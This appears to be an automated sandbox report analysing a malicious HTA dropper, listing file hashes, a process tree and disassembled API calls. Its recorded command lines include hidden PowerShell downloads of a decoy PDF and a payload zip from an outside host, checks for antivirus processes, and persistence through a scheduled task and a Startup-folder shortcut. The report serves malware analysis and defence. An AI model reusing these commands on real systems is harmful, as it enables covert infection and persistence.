SSDEEP:	12:yeRLaWQMnFQlRKfdFfBy6T6FYoX0fH8PkwWWOxPLA3jw/fQMlNdP8LOUa:y2GWnSKfdtw46FYfP1icPLHCfa
MD5:	5274D23C3AB7C3D5A4F3F86D4249A545
SHA1:	8A3778F5083169B281B610F2036E79AEA3020192
SHA-256:	8FEF0EEC745051335467846C2F3059BD450048E744D83EBE6B7FD7179A5E5F97
SHA-512:	FC3E30422A35A78C93EDB2DAD6FAF02058FC37099E9CACD639A079DF70E650FEC635CF7592FFB069F23E90B47B0D7CF3518166848494A35AF1E10B50BB177574
Malicious:	false
Preview:	0...0.....0....H........0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G4..240806194648Z..240827194648Z.00.0...U.#..0.......q]dL..g?....O0...U........0....H.............vz..@.Nm...6d...t;.Jx?....6...p...#.[.......o.q...;.........?......o...^p0R.......~....)....i.n;A.n.z..O~..%=..s..W.4.+........G...*..=....xen$_i"s..\...L..4../<.4...G.....L...c..k@.J.rC.4h.c.ck./.Q-r53..a#.8#......0.n......a.-'..S. .>..xAKo.k.....;.D>....sb '<..-o.KE...X!i.].c.....o~.q........D...`....N... W:{.3......a@....i....#./..eQ...e.......W.s..V:.38..U.H{.>.....#....?{.....bYAk'b0on..Gb..-..).."q2GO<S.C...FsY!D....x..]4.....X....Y...Rj.....I.96$.4ZQ&..$,hC..H.%..hE....

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CineBlend.url

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	MS Windows 95 Internet shortcut text (URL=<"C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.js" >), ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	102
Entropy (8bit):	4.8715641605102
Encrypted:	false
SSDEEP:	3:HRAbABGQaFyw3pYot+kiE2J5okZYaLi2eOL9PWHq:HRYF5yjowkn23oqLXL9Iq
MD5:	60C30A29A25A4ABF2D3F0FE098E005C2
SHA1:	B7D90B28A3E9C6CBF8979CA6228483EDDE684442
SHA-256:	F698194EBBDD6A82ED230814561DAD191190D5210815C774BCC14A45116970B0
SHA-512:	840766C69BDAF51AB7E72ED8D03C5D381A653310EC32505CD7FD1D8C29B3FC3F3D7641D66C792D6174B0F5AD93717930ADD855DFA863D221FB04090EA7EA09EE
Malicious:	true
Preview:	[InternetShortcut] ..URL="C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.js" ..

C:\Users\user\Downloads\W2.pdf

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	PDF document, version 1.4, 1 pages
Category:	dropped
Size (bytes):	393964
Entropy (8bit):	7.894863553506209
Encrypted:	false
SSDEEP:	6144:fz/0MaxA4h4379ErMr1NPe8ThAvXG4e5c8m1TCso1/kWS7uu:fz/0MaqxKy1NkvXG4MpmNokF
MD5:	57F09EA46C7039EA45BB3FD01BBD8C80
SHA1:	1365FF5E6E6EFC3E501D350711672F6A232AA9F8
SHA-256:	3850E8022E3990B709DA7CDDBFD3F830EB86F34AF89D5939E2999C1E7DE9766F
SHA-512:	6DE0ACD9D03BDE584A7B2C2C7781530BA7504622B518523993311AD6174D2A9890E9D230A2A3A51D76615111A9F62259A9615378440690F20708B201B19A17F8
Malicious:	true
Preview:	%PDF-1.4.%......4 0 obj.<</Linearized 1/L 393964/O 6/E 362617/N 1/T 393770/H [ 1316 238]>>.endobj. .xref..4 51..0000000016 00000 n..0000001554 00000 n..0000001614 00000 n..0000002242 00000 n..0000002407 00000 n..0000002915 00000 n..0000003346 00000 n..0000003757 00000 n..0000003803 00000 n..0000005034 00000 n..0000006941 00000 n..0000008869 00000 n..0000010482 00000 n..0000011608 00000 n..0000012618 00000 n..0000012731 00000 n..0000013728 00000 n..0000014512 00000 n..0000014563 00000 n..0000014676 00000 n..0000014801 00000 n..0000029764 00000 n..0000030031 00000 n..0000058294 00000 n..0000058547 00000 n..0000085116 00000 n..0000085374 00000 n..0000094559 00000 n..0000094824 00000 n..0000094951 00000 n..0000095014 00000 n..0000095044 00000 n..0000095120 00000 n..0000113594 00000 n..0000113891 00000 n..0000113954 00000 n..0000114069 00000 n..0000132543 00000 n..0000191838 00000 n..0000192135 00000 n..0000192913 00000 n..0000193209 00000 n..0000196912 00000 n..0000197906 0

\Device\Null

Download File

Process:	C:\Windows\SysWOW64\timeout.exe
File Type:	ASCII text, with CRLF line terminators, with overstriking
Category:	dropped
Size (bytes):	95
Entropy (8bit):	4.176025638229203
Encrypted:	false
SSDEEP:	3:hYFEHgAR+mQRKVxLZtFctFst3g4t32vov:hYFEmaNZM3MXt3X
MD5:	74D8C80188CB3C2AFD82E1821813B1CB
SHA1:	EEB1D7DC1821B7841EE50BC53AFF890544ECFBDA
SHA-256:	970057AABB3408E53F34A42FEF79D515688F7C1BBEA0567C1BF9B477B53F3AC2
SHA-512:	677341DE20037DD57D34587520DF436CFE3DFB09824AC4926F0BAC3B428B3FACB2007CADC74254879736195E4573D44AB88DE80E52D1A559C7096E7F9587A5BE
Malicious:	false
Preview:	..Waiting for 10 seconds, press a key to continue ..... 9.. 8.. 7.. 6.. 5.. 4.. 3.. 2.. 1.. 0..

Static File Info

General

File type:	HTML document, ASCII text, with CRLF line terminators
Entropy (8bit):	4.564973670021895
TrID:	HyperText Markup Language (12001/1) 40.67% HyperText Markup Language (11501/1) 38.98% HyperText Markup Language (6006/1) 20.35%
File name:	c2.hta
File size:	3'411 bytes
MD5:	ece58ed90bef5251133c688f6afe915f
SHA1:	0b56d72ecb891950f8b4e8bf7288aee0ac102101
SHA256:	bbe818541c34a4def85455fa7a1392d2ded1e76ca6d89f08125a13d09ea4b93a
SHA512:	6bfc48dcfe02152939914c90677854a3292e83beea95573d427d31f76e4deba29e867e9c18719442c1dac19013b5da885f906c78f33a9d4c0d244287927032ad
SSDEEP:	48:uOZ+wfT1tHcmhdT1hnLU5Lo1fWKGcBF50H3/CO:uAr1JhV1hL6/LAQH3
TLSH:	A661C01FDE939F628932CA23086BA80DDD9DC50F15508489750CCC4A7F7537CA8D06FA
File Content Preview:	<html>..<head>.. <title></title>.. <HTA:APPLICATION.. ID="downloadBatApp".. APPLICATIONNAME="BAT Downloader".. WINDOWSTATE="minimize".. BORDER="thin".. SCROLL="no".. SINGLEINSTANCE="yes"...SHOWINTASKBAR="no"

Target ID:	0
Start time:	21:02:53
Start date:	04/01/2025
Path:	C:\Windows\SysWOW64\mshta.exe
Wow64 process (32bit):	true
Commandline:	mshta.exe "C:\Users\user\Desktop\c2.hta"
Imagebase:	0xf80000
File size:	13'312 bytes
MD5 hash:	06B02D5C097C7DB1F109749C45F3F505
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	21:02:55
Start date:	04/01/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\temp.bat"
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	21:02:55
Start date:	04/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	21:02:55
Start date:	04/01/2025
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/W2.pdf -OutFile C:\Users\user\Downloads\W2.pdf"
Imagebase:	0x330000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	21:02:58
Start date:	04/01/2025
Path:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\W2.pdf"
Imagebase:	0x7ff6bc1b0000
File size:	5'641'176 bytes
MD5 hash:	24EAD1C46A47022347DC0F05F6EFBB8C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	6
Start time:	21:02:58
Start date:	04/01/2025
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip"
Imagebase:	0x330000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	21:02:59
Start date:	04/01/2025
Path:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Imagebase:	0x7ff74bb60000
File size:	3'581'912 bytes
MD5 hash:	9B38E8E8B6DD9622D24B53E095C5D9BE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	8
Start time:	21:03:00
Start date:	04/01/2025
Path:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2100 --field-trial-handle=1632,i,1275163291349414999,11919698709782413432,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Imagebase:	0x7ff74bb60000
File size:	3'581'912 bytes
MD5 hash:	9B38E8E8B6DD9622D24B53E095C5D9BE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	12
Start time:	21:03:12
Start date:	04/01/2025
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	powershell -WindowStyle Hidden -Command "Expand-Archive -Path C:\Users\user\AppData\Local\Temp\msword.zip -DestinationPath C:\Users\user\AppData\Local\Temp\msword -Force"
Imagebase:	0x330000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	21:03:29
Start date:	04/01/2025
Path:	C:\Users\user\AppData\Local\Temp\msword\msword.exe
Wow64 process (32bit):	true
Commandline:	msword.exe
Imagebase:	0x400000
File size:	524'295'939 bytes
MD5 hash:	6BCF42715FD1768FE1013C702612D0EE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	21:03:29
Start date:	04/01/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\cleanup.bat"
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	21:03:29
Start date:	04/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	21:03:29
Start date:	04/01/2025
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout /t 10
Imagebase:	0x430000
File size:	25'088 bytes
MD5 hash:	976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	21:03:30
Start date:	04/01/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /c copy Market Market.cmd && Market.cmd
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	21:03:30
Start date:	04/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	21:03:32
Start date:	04/01/2025
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist
Imagebase:	0xc0000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	21:03:32
Start date:	04/01/2025
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /I "wrsa opssvc"
Imagebase:	0x3c0000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	21:03:33
Start date:	04/01/2025
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist
Imagebase:	0xc0000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	21:03:33
Start date:	04/01/2025
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Imagebase:	0x3c0000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	21:03:34
Start date:	04/01/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c md 677826
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	21:03:34
Start date:	04/01/2025
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /V "MechanicalDlModularRuSchedulingVisibilityProposalsClimb" Hearings
Imagebase:	0x3c0000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	21:03:34
Start date:	04/01/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c copy /b ..\Charged + ..\Syndicate + ..\Controversy + ..\Fig + ..\Phentermine + ..\Peripheral + ..\Lets + ..\Usgs + ..\Viewed + ..\Dealer + ..\Matter N
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	21:03:34
Start date:	04/01/2025
Path:	C:\Users\user\AppData\Local\Temp\677826\Prostores.com
Wow64 process (32bit):	true
Commandline:	Prostores.com N
Imagebase:	0x270000
File size:	947'288 bytes
MD5 hash:	62D09F076E6E0240548C2F837536A46A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs
Has exited:	false

Show Windows behavior

Target ID:	29
Start time:	21:03:34
Start date:	04/01/2025
Path:	C:\Windows\SysWOW64\choice.exe
Wow64 process (32bit):	true
Commandline:	choice /d y /t 5
Imagebase:	0xde0000
File size:	28'160 bytes
MD5 hash:	FCE0E41C87DC4ABBE976998AD26C27E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	21:03:34
Start date:	04/01/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c schtasks.exe /create /tn "Troubleshooting" /tr "wscript //B 'C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.js'" /sc minute /mo 5 /F
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	21:03:34
Start date:	04/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	21:03:34
Start date:	04/01/2025
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	schtasks.exe /create /tn "Troubleshooting" /tr "wscript //B 'C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.js'" /sc minute /mo 5 /F
Imagebase:	0xad0000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	21:03:35
Start date:	04/01/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CineBlend.url" & echo URL="C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CineBlend.url" & exit
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	21:03:35
Start date:	04/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	21:03:35
Start date:	04/01/2025
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.js"
Imagebase:	0x7ff740610000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	21:03:35
Start date:	04/01/2025
Path:	C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr" "C:\Users\user\AppData\Local\MediaFusion Technologies Inc\s"
Imagebase:	0xb30000
File size:	947'288 bytes
MD5 hash:	62D09F076E6E0240548C2F837536A46A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	21:03:49
Start date:	04/01/2025
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.js"
Imagebase:	0x7ff740610000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	21:03:49
Start date:	04/01/2025
Path:	C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\MediaFusion Technologies Inc\CineBlend.scr" "C:\Users\user\AppData\Local\MediaFusion Technologies Inc\s"
Imagebase:	0x5d0000
File size:	947'288 bytes
MD5 hash:	62D09F076E6E0240548C2F837536A46A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	17.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	21%
Total number of Nodes:	1482
Total number of Limit Nodes:	28

Executed Functions

Function 004050F9 Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 295
windowclipboardmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDlgItem.USER32(?,00000403), ref: 0040515B
GetDlgItem.USER32(?,000003EE), ref: 0040516A
GetClientRect.USER32(?,?), ref: 004051C2
GetSystemMetrics.USER32(00000015), ref: 004051CA
SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051EB
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051FC
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040520F
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040521D
SendMessageW.USER32(?,00001024,00000000,?), ref: 00405230
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405252
ShowWindow.USER32(?,00000008), ref: 00405266
GetDlgItem.USER32(?,000003EC), ref: 00405287
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405297
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004052AC
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004052B8
GetDlgItem.USER32(?,000003F8), ref: 00405179

Part of subcall function 00403DC4: SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2

Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,004283D1,74DF23A0,00000000), ref: 00406902

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

GetDlgItem.USER32(?,000003EC), ref: 004052D7
CreateThread.KERNELBASE(00000000,00000000,Function_00005073,00000000), ref: 004052E5
CloseHandle.KERNELBASE(00000000), ref: 004052EC
ShowWindow.USER32(00000000), ref: 00405313
ShowWindow.USER32(?,00000008), ref: 00405318
ShowWindow.USER32(00000008), ref: 0040535F
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405391
CreatePopupMenu.USER32 ref: 004053A2
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004053B7
GetWindowRect.USER32(?,?), ref: 004053CA
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053EC
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405427
OpenClipboard.USER32(00000000), ref: 00405437
EmptyClipboard.USER32 ref: 0040543D
GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 00405449
GlobalLock.KERNEL32(00000000), ref: 00405453
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405467
GlobalUnlock.KERNEL32(00000000), ref: 00405489
SetClipboardData.USER32(0000000D,00000000), ref: 00405494
CloseClipboard.USER32 ref: 0040549A

Strings

New install of "%s" to "%s", xrefs: 004051AE
{, xrefs: 0040537E

Memory Dump Source

Source File: 0000000F.00000002.1999513934.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.1999493364.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999531805.0000000000409000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.000000000040C000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.0000000000420000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.0000000000434000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999551018.000000000046B000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000F.00000002.1999661181.0000000000500000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_msword.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
String ID: New install of "%s" to "%s"${
API String ID: 2110491804-1641061399
Opcode ID: 27dd6abe78b25364254968db719b86f88dfe8c12dd5559a56974b496927f2e5b
Instruction ID: db3ff0878cedf1d1b3e6f9985675ba3e3c8e3ad145c0decdf5c07b0ce3ef5d1a
Opcode Fuzzy Hash: 27dd6abe78b25364254968db719b86f88dfe8c12dd5559a56974b496927f2e5b
Instruction Fuzzy Hash: 46B15970900609BFEB11AFA1DD89EAE7B79FB04354F00803AFA05BA1A1C7755E81DF58

Function 004038AF Relevance: 52.8, APIs: 22, Strings: 8, Instructions: 304
filestringcomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

#17.COMCTL32 ref: 004038CE
SetErrorMode.KERNELBASE(00008001), ref: 004038D9
OleInitialize.OLE32(00000000), ref: 004038E0

Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353

SHGetFileInfoW.SHELL32(0040A264,00000000,?,000002B4,00000000), ref: 00403908

Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042

GetCommandLineW.KERNEL32(00476AA0,NSIS Error), ref: 0040391D
GetModuleHandleW.KERNEL32(00000000,004CF0A0,00000000), ref: 00403930
CharNextW.USER32(00000000,004CF0A0,00000020), ref: 00403957
GetTempPathW.KERNEL32(00002004,004E30C8,00000000,00000020), ref: 00403A2C
GetWindowsDirectoryW.KERNEL32(004E30C8,00001FFF), ref: 00403A41
lstrcatW.KERNEL32(004E30C8,\Temp), ref: 00403A4D
DeleteFileW.KERNELBASE(004DF0C0), ref: 00403A64
CoUninitialize.COMBASE(?), ref: 00403AFD
ExitProcess.KERNEL32 ref: 00403B1D
lstrcatW.KERNEL32(004E30C8,~nsu.tmp), ref: 00403B29
lstrcmpiW.KERNEL32(004E30C8,004DB0B8,004E30C8,~nsu.tmp), ref: 00403B35
CreateDirectoryW.KERNEL32(004E30C8,00000000), ref: 00403B41
SetCurrentDirectoryW.KERNEL32(004E30C8), ref: 00403B48
DeleteFileW.KERNEL32(0043DD40,0043DD40,?,00483008,0040A204,0047F000,?), ref: 00403B99
